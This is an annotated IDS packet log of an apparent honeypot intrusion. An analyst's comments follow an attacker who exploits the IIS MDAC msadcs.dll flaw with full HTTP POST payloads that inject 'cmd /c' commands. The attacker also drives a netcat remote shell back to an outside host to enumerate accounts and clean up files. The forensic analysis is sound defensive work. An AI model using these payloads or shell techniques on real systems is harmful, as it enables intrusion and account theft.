[**] netcat session 6969 [**]
02/04-05:45:37.480132 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:2682 IpLen:20 DgmLen:75 DF
***AP*** Seq: 0x2CBECDA6 Ack: 0x9E43FBE7 Win: 0x216A TcpLen: 20
cd ......C:\exploits>..C:\exploits>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:37.830864 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:2938 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBECDC9 Ack: 0x9E43FBEB Win: 0x2166 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\exploits....12/26/00 07:36p
...12/26/00 07:36p ....1
2/26/00
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:38.338194 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:3194 IpLen:20 DgmLen:302 DF
***AP*** Seq: 0x2CBECE91 Ack: 0x9E43FBEB Win: 0x2166 TcpLen: 20
07:36p microsoft..12/26/00 07:35p
newfiles..12/26/00 07:24p
unix.. 5 File(s) 0 bytes..
1,690,861,056 bytes free....C:\exploits>..C:\exp
loits>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# After exploring the subdirectories, he/she 'cd's back to 'c:\'
[**] netcat session 6969 [**]
02/04-05:45:40.584634 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:4218 IpLen:20 DgmLen:59 DF
***AP*** Seq: 0x2CBECF97 Ack: 0x9E43FBF4 Win: 0x215D TcpLen: 20
cd ......C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:40.935399 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:4474 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBECFAA Ack: 0x9E43FBF7 Win: 0x215A TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:41.432721 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:4730 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBED072 Ack: 0x9E43FBF7 Win: 0x215A TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:42a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run 'pdump.exe' again and append the output to file 'c:\yay.txt'
!@# He/She might have noticed the 0 file size for yay.txt in the directory listing.
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:45:55.240124 213.116.251.162:1901 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12216 IpLen:20 DgmLen:753 DF
***AP*** Seq: 0xA114BDBA Ack: 0x2CC17E0C Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 559..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 350..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .p
.d.u.m.p...e.x.e. .>.>. .c.:.\.y.a.y...t.x.t.".).|.'.......d.r.i
.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*..
.m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\
.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!W
ORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:58.581282 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:7802 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBED308 Ack: 0x9E43FBFC Win: 0x2155 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:59.165524 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:8058 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBED3D0 Ack: 0x9E43FBFC Win: 0x2155 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:44a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:46:01.285062 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9082 IpLen:20 DgmLen:165 DF
***AP*** Seq: 0x2CBED666 Ack: 0x9E43FC02 Win: 0x214F TcpLen: 20
dir'..The name specified is not recognized as an..internal or ex
ternal command, operable program or batch file.....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:46:03.098674 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9594 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBED6E3 Ack: 0x9E43FC07 Win: 0x214A TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:46:03.659599 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9850 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBED7AB Ack: 0x9E43FC07 Win: 0x214A TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:44a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# After running dir a couple more times and seeing the same result (0 file size), he/she tries to read the file using 'cat'.
!@# This fails, as this still isn't a *nix box.
[**] netcat session 6969 [**]
02/04-05:46:06.402691 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:11130 IpLen:20 DgmLen:168 DF
***AP*** Seq: 0x2CBEDA41 Ack: 0x9E43FC10 Win: 0x2141 TcpLen: 20
cat yay..The name specified is not recognized as an..internal or
external command, operable program or batch file.....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:46:08.806154 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:12666 IpLen:20 DgmLen:107 DF
***AP*** Seq: 0x2CBEDAC1 Ack: 0x9E43FC1B Win: 0x2136 TcpLen: 20
type yay...The system cannot find the file specified.....C:\>..C
:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries again using the 'type' command.
!@# File yay.txt is empty.
[**] netcat session 6969 [**]
02/04-05:46:11.710118 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:14202 IpLen:20 DgmLen:66 DF
***AP*** Seq: 0x2CBEDB04 Ack: 0x9E43FC29 Win: 0x2128 TcpLen: 20
type yay.txt....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:46:20.322907 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:15482 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CBEDB1E Ack: 0x9E43FC36 Win: 0x211B TcpLen: 20
net session..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Using remote shell (web server privileges), he/she tries to run 'net session' command, likely to check for netbios shares in use.
!@# This fails due to lack of privileges.
[**] netcat session 6969 [**]
02/04-05:46:20.787688 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:15738 IpLen:20 DgmLen:107 DF
***AP*** Seq: 0x2CBEDB2B Ack: 0x9E43FC36 Win: 0x211B TcpLen: 20
System error 5 has occurred......Access is denied........C:\>..C
:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Using remote shell, he/she runs 'net users' command for a listing of local accounts.
[**] netcat session 6969 [**]
02/04-05:46:24.733232 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:17018 IpLen:20 DgmLen:51 DF
***AP*** Seq: 0x2CBEDB6E Ack: 0x9E43FC41 Win: 0x2110 TcpLen: 20
net users..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# It works
[**] netcat session 6969 [**]
02/04-05:46:25.183904 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:17274 IpLen:20 DgmLen:315 DF
***AP*** Seq: 0x2CBEDB79 Ack: 0x9E43FC41 Win: 0x2110 TcpLen: 20
..User accounts for \\.....-------------------------------------
------------------------------------------..Administrator
Guest IUSR_KENNY ..IWAM_KE
NNY ..The command completed with one or more error
s........C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability (system privs.) to run 'net session' command and redirect output to file 'yay2.txt'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:47:48.722495 213.116.251.162:1922 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12462 IpLen:20 DgmLen:751 DF
***AP*** Seq: 0xA2D450B8 Ack: 0x2CC3394E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 557..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 348..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .s.e.s.s.i.o.n. .>.>.y.a.y.2...t.x.t.".).|.'.......d.r.i.v
.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m
.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t
.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WOR
LD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run 'net session' command and redirect output to file 'c:\yay2.txt'.
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:47:55.733919 213.116.251.162:1924 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12474 IpLen:20 DgmLen:757 DF
***AP*** Seq: 0xA2F0BD5C Ack: 0x2CC3551E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 563..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 354..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .s.e.s.s.i.o.n. .>.>.c.:.\.y.a.y.2...t.x.t.".).|.'.......d
.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(
.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t
.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YO
UR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:48:53.427873 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:29050 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEDC8C Ack: 0x9E43FC46 Win: 0x210B TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:48:53.996784 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:29306 IpLen:20 DgmLen:751 DF
***AP*** Seq: 0x2CBEDD54 Ack: 0x9E43FC46 Win: 0x210B TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:46a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt..02/04/01 06:46a
38 yay2.txt.. 14 File(s) 78,643,560
bytes.. 1,690,861,056 bytes free....C:\
>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses remote shell to read file 'c:\yay2.txt'. Nobody is connected.
[**] netcat session 6969 [**]
02/04-05:48:59.035475 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:31354 IpLen:20 DgmLen:105 DF
***AP*** Seq: 0x2CBEE01B Ack: 0x9E43FC55 Win: 0x20FC TcpLen: 20
type yay2.txt..There are no entries in the list........C:\>..C:\
>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses remote shell to clean up file 'c:\yay2.txt' (but not c:\Program Files\Common Files\system\msadc\yay2.txt)
[**] netcat session 6969 [**]
02/04-05:49:07.447963 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:33658 IpLen:20 DgmLen:62 DF
***AP*** Seq: 0x2CBEE05C Ack: 0x9E43FC63 Win: 0x20EE TcpLen: 20
del yay2.txt....C:\>..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:07.919822 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:33914 IpLen:20 DgmLen:44 DF
***AP*** Seq: 0x2CBEE072 Ack: 0x9E43FC63 Win: 0x20EE TcpLen: 20
C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:14.057447 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37242 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x2CBEE076 Ack: 0x9E43FC7B Win: 0x20D6 TcpLen: 20
net session >>yay3.txt..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries 'net session' command again from remote shell but still doesn't have required privileges
[**] netcat session 6969 [**]
02/04-05:49:14.394221 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37498 IpLen:20 DgmLen:107 DF
***AP*** Seq: 0x2CBEE08E Ack: 0x9E43FC7D Win: 0x20D4 TcpLen: 20
System error 5 has occurred......Access is denied........C:\>..C
:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:14.758914 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37754 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEE0D1 Ack: 0x9E43FC80 Win: 0x20D1 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:15.318578 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38010 IpLen:20 DgmLen:751 DF
***AP*** Seq: 0x2CBEE199 Ack: 0x9E43FC80 Win: 0x20D1 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:46a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt..02/04/01 06:48a
0 yay3.txt.. 14 File(s) 78,643,522
bytes.. 1,690,861,056 bytes free....C:\
>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:21.271333 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40314 IpLen:20 DgmLen:52 DF
***AP*** Seq: 0x2CBEE460 Ack: 0x9E43FC8E Win: 0x20C3 TcpLen: 20
del yay&.*..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:21.599220 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40570 IpLen:20 DgmLen:182 DF
***AP*** Seq: 0x2CBEE46C Ack: 0x9E43FC91 Win: 0x20C0 TcpLen: 20
Could Not Find C:\yay..The name specified is not recognized as a
n..internal or external command, operable program or batch file.
....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:22.144461 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40826 IpLen:20 DgmLen:951 DF
***AP*** Seq: 0x2CBEE4FA Ack: 0x9E43FC91 Win: 0x20C0 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..11/26/00 12:34p 0 CONFIG.SYS..12/26
/00 07:36p exploits..12/07/00 03:30p
InetPub..12/07/00 03:12p
Multimedia Files..12/26/00 07:10p New
Folder..01/26/01 02:10p 78,643,200 pagefile.sys..12/
21/00 08:59p Program Files..12/21/00 08:
59p TEMP..02/04/01 06:46a
WINNT..12/26/00 07:09p wiretrip..0
2/04/01 06:43a 0 yay.txt..02/04/01 06:48a
0 yay3.txt.. 14 File(s) 78,
643,522 bytes.. 1,690,861,056 bytes fre
e....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries cleaning up a bit by running 'del yay*'
!@# This deletes yay3.txt but looks like yay.txt is locked by another process.
[**] netcat session 6969 [**]
02/04-05:49:28.278508 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:42618 IpLen:20 DgmLen:156 DF
***AP*** Seq: 0x2CBEE889 Ack: 0x9E43FC9B Win: 0x20B6 TcpLen: 20
del yay*..C:\yay.txt..The process cannot access the file because
..it is being used by another process.....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:37.541896 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:45178 IpLen:20 DgmLen:94 DF
***AP*** Seq: 0x2CBEE8FD Ack: 0x9E43FCA9 Win: 0x20A8 TcpLen: 20
del yay3.txt..Could Not Find C:\yay3.txt....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:38.444008 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:45946 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEE933 Ack: 0x9E43FCAE Win: 0x20A3 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:38.944406 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:46202 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBEE9FB Ack: 0x9E43FCAE Win: 0x20A3 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:46a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run 'net users' and append output to file 'heh.txt'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:49:54.324722 213.116.251.162:1930 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12612 IpLen:20 DgmLen:745 DF
***AP*** Seq: 0xA4B7CF0B Ack: 0x2CC52434 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 551..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 342..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .u.s.e.r.s. .>.>.h.e.h...t.x.t.".).|.'.......d.r.i.v.e.r.=
.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.)
.}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o
.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--.
.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run 'net users' and append output to file 'c:\heh.txt'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:50:00.058360 213.116.251.162:1932 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12622 IpLen:20 DgmLen:751 DF
***AP*** Seq: 0xA4CF1F07 Ack: 0x2CC53AC7 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 557..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 348..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .u.s.e.r.s. .>.>.c.:.\.h.e.h...t.x.t.".).|.'.......d.r.i.v
.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m
.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t
.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WOR
LD!--..
